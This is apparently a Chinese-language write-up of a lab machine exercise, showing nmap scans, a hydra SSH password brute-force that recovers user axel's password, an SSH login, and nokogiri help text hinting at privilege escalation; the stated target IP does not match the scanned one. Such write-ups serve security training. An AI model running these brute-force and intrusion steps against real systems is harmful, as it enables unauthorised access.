┌──(root㉿kali)-[/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:48 CST Nmap scan report for 192.168.2.1 Host is up (0.00097s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.0019s latency). MAC Address: 08:00:27:92:7B:DF (Oracle VirtualBox virtual NIC) Nmap scan report for contact.com (192.168.2.44) Host is up (0.0067s latency). MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.18 seconds
靶机IP:192.168.2.70
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.44 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:49 CST Nmap scan report for contact.com (192.168.2.44) Host is up (0.00077s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 16.20 seconds
┌──(root㉿kali)-[/miaosec] └─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.44 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:50 CST Nmap scan report for contact.com (192.168.2.44) Host is up (0.0012s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) |_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.56 (Debian) MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8, Linux 5.0 - 5.5 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.32 seconds
3.udp扫描
1 2 3 4 5 6 7 8 9 10 11
┌──(root㉿kali)-[/miaosec] └─# nmap -sU --top-ports 100 192.168.2.44 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:50 CST Nmap scan report for contact.com (192.168.2.44) Host is up (0.00098s latency). Not shown: 99 closed udp ports (port-unreach) PORT STATE SERVICE 68/udp open|filtered dhcpc MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 108.46 seconds
┌──(root㉿kali)-[/miaosec] └─# hydra -t 64 -l axel -P /tools/wordlist/pass.txt ssh://192.168.2.44 -F -I Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-14 16:16:26 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 64 tasks per 1 server, overall 64 tasks, 10003 login tries (l:1/p:10003), ~157 tries per task [DATA] attacking ssh://192.168.2.44:22/ [STATUS] 495.00 tries/min, 495 tries in 00:01h, 9546 to doin 00:20h, 26 active [22][ssh] host: 192.168.2.44 login: axel password: bambam [STATUS] attack finished for 192.168.2.44 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-14 16:18:43
成功获取到密码bambam
四、获取到axel权限
直接使用凭证axel:bambam进行登录
1 2 3 4 5 6 7
┌──(root㉿kali)-[~] └─# ssh axel@192.168.2.44 Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.2.44' (ED25519) to the list of known hosts. axel@192.168.2.44's password: axel@look:~$ id uid=1000(axel) gid=1000(axel) grupos=1000(axel)
Options: --typetype Parse as type: xml or html (default: auto) -C file Specifies initialization file to load (default /root/.nokogirirc) -E, --encoding encoding Read as encoding (default: none) -e command Specifies script from command-line. --rng <uri|path> Validate using this rng file. -?, --help Show this message -v, --version Show version
直接运行-e参数,提示我们需要一个文件路径,再选择参数
1 2
Nokogiri: an HTML, XML, SAX, and Reader parser Usage: nokogiri <uri|path> [options]